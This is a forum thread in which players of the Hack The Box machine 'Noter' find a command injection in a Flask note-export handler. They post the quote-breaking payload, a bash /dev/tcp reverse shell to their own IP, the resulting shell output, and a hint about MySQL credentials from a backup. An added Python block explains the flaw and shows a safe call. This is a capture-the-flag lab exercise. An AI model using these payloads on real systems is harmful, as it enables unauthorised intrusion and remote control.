Noter - HTB [Discussion]
Can anyone help me to get user in this machine ????
Reply
(May 8, 2022, 05:42 PM)just4htb1337 Wrote:
(May 8, 2022, 05:30 PM)hackerman Wrote:
(May 8, 2022, 05:24 PM)just4htb1337 Wrote: Is this the correct path to user?

```
# Export remote
@app.route('/export_note_remote', methods=['POST'])
@is_logged_in
def export_note_remote():
    if check_VIP(session['username']):
        try:
            url = request.form['url']

            status, error = parse_url(url)

            if (status is True) and (error is None):
                try:
                    # The body served at the user-supplied URL is fetched ...
                    r = pyrequest.get(url,allow_redirects=True)
                    rand_int = random.randint(1,10000)
                    # ... and interpolated unescaped into a bash command line
                    command = f"node misc/md-to-pdf.js  $'{r.text.strip()}' {rand_int}"
                    subprocess.run(command, shell=True, executable="/bin/bash")

                    if os.path.isfile(attachment_dir + f'{str(rand_int)}.pdf'):

                        return send_file(attachment_dir + f'{str(rand_int)}.pdf', as_attachment=True)

                    else:
                        return render_template('export_note.html', error="Error occured while exporting the !")
# (excerpt as posted; the except clauses and the non-VIP branch are not shown)
```

possible https://security.snyk.io/vuln/SNYK-JS-MDTOPDF-1657880


Tried that one as well, but somehow it didn't work ... could be that I am doing it wrong


I can't get any of the notes to export successfully. I get 500 errors on internal and all the remote give me "Error occured while exporting the note!"
Reply
(May 8, 2022, 06:04 PM)hackerman Wrote:
I can't get any of the notes to export successfully. I get 500 errors on internal and all the remote give me "Error occured while exporting the note!"

Same here... I guess there is something we are missing :dodgy:
Reply
(May 8, 2022, 06:04 PM)hackerman Wrote:
I can't get any of the notes to export successfully. I get 500 errors on internal and all the remote give me "Error occured while exporting the note!"


I get a 500 error as well.

/export_note_remote (the "Export directly from cloud function") looks more promising I think:

```
r = pyrequest.get(url,allow_redirects=True)
rand_int = random.randint(1,10000)
command = f"node misc/md-to-pdf.js  $'{r.text.strip()}' {rand_int}"
subprocess.run(command, shell=True, executable="/bin/bash")
```

I gave a URL like http://10.10.xxx.xxx/test.md (pointing to my own web server) and I could see an incoming connection.
Reply
(May 8, 2022, 06:10 PM)Exa Wrote:
I get a 500 error as well.

/export_note_remote (the "Export directly from cloud function") looks more promising I think. When I give an url like http://10.10.xxx.xxx/test.md (pointing to my own web server) then I can control the command string:

```
r = pyrequest.get(url,allow_redirects=True)
rand_int = random.randint(1,10000)
command = f"node misc/md-to-pdf.js  $'{r.text.strip()}' {rand_int}"
subprocess.run(command, shell=True, executable="/bin/bash")
```

I tried a test.md which contained "; sleep 10;" but no luck there.

Using the export_note I get "Error occured while exporting the note!". Import from my web server works fine but no command execution; the payload gets rendered as text in the body field.
Reply
(May 8, 2022, 06:10 PM)Exa Wrote: I can't get any of the notes to export successfully. I get 500 errors on internal and all the remote give me "Error occured while exporting the note!"

I get a 500 error as well.

/export_note_remote (the "Export directly from cloud function") looks more promising I think:

```
r = pyrequest.get(url,allow_redirects=True)
rand_int = random.randint(1,10000)
command = f"node misc/md-to-pdf.js  $'{r.text.strip()}' {rand_int}"
subprocess.run(command, shell=True, executable="/bin/bash")
```

I gave a URL like http://10.10.xxx.xxx/test.md (pointing to my own web server) and I could see an incoming connection.

This is pretty much exactly what I'm doing. Errors with an empty md file
Reply
(May 8, 2022, 06:21 PM)hackerman Wrote:
This is pretty much exactly what I'm doing. Errors with an empty md file


Sorry, didn't see your message.
Anyway, I always get "Error occured while exporting the note!" regardless of what my md file contains.
Reply
So I think I got code execution. My test.md file contains:

a'; sleep 10; echo 'a
Reply
(May 8, 2022, 06:37 PM)Exa Wrote: So I think I got code execution. My test.md file contains:

a'; sleep 10; echo 'a


nice find, the ' breaks apart $' '
Able to get shell with this
Reply
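An added example (not part of the thread and not the application's code) of why a single quote in the fetched body ends the `$'...'` argument built by the quoted handler, next to the call shape that keeps the body as one argument. The function names, the sample bodies and the Python child standing in for `node misc/md-to-pdf.js` are assumptions, and `shlex` only approximates bash quoting.

```python
import json
import shlex
import subprocess
import sys

def vulnerable_command(body: str, rand_int: int) -> str:
    """Command string built the same way as in the handler quoted in the thread."""
    return f"node misc/md-to-pdf.js  $'{body.strip()}' {rand_int}"

def shell_commands(command: str) -> list[list[str]]:
    """Approximate bash parsing: one word list per ';'-separated command.
    shlex reads $'...' as '$' plus a single-quoted string, which ends at the same
    quote as in bash when the body has no backslashes. Open quote -> ValueError."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=";")
    lexer.whitespace_split = True
    lexer.commenters = ""  # '#' in a Markdown body must not start a comment
    commands, current = [], []
    for token in lexer:
        if token and not token.strip(";"):  # a bare ';' ends the command
            commands.append(current)
            current = []
        else:
            current.append(token)
    commands.append(current)
    return [words for words in commands if words]

def is_single_invocation(body: str, rand_int: int = 1234) -> bool:
    """True only if the parse yields one command: node, script, body, number."""
    try:
        commands = shell_commands(vulnerable_command(body, rand_int))
    except ValueError:  # e.g. one apostrophe in the note leaves a quote open
        return False
    return len(commands) == 1 and len(commands[0]) == 4

def converter_argv(body: str, rand_int: int) -> list[str]:
    """Hardened call shape: argv list, no shell. A Python child stands in for
    node misc/md-to-pdf.js (assumption) and reports the arguments it received."""
    child = "import json, sys; print(json.dumps(sys.argv[1:]))"
    done = subprocess.run([sys.executable, "-c", child, body.strip(), str(rand_int)],
                          capture_output=True, text=True, check=True)
    return json.loads(done.stdout)

# Constructed sample bodies, not taken from the target application.
BENIGN = "# Title\nsome *markdown* text"
QUOTED = "a'; echo INJECTED; echo 'a"  # same quote placement as the thread's test.md

if __name__ == "__main__":
    for body in (BENIGN, QUOTED, "it's a note"):
        print(repr(body), is_single_invocation(body), converter_argv(body, 7))
```

In the handler itself the same shape would be `subprocess.run(["node", "misc/md-to-pdf.js", r.text.strip(), str(rand_int)])` with no `shell=True`, so quotes in the body never reach a shell parser.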
(May 8, 2022, 06:40 PM)hackerman Wrote:
nice find, the ' breaks apart $' '
Able to get shell with this


So with this I get a reverse shell:

a'; bash -i >& /dev/tcp/10.10.xxx.xxx/4000 0>&1; echo 'a


svc@noter:~/app/web$ id
id
uid=1001(svc) gid=1001(svc) groups=1001(svc)

svc@noter:~/app/web$ cat /home/svc/user.txt


Okay, so the MySQL credentials from app_backup_1635803546.zip can be used to connect to port 3306.
Anything interesting there?
Reply

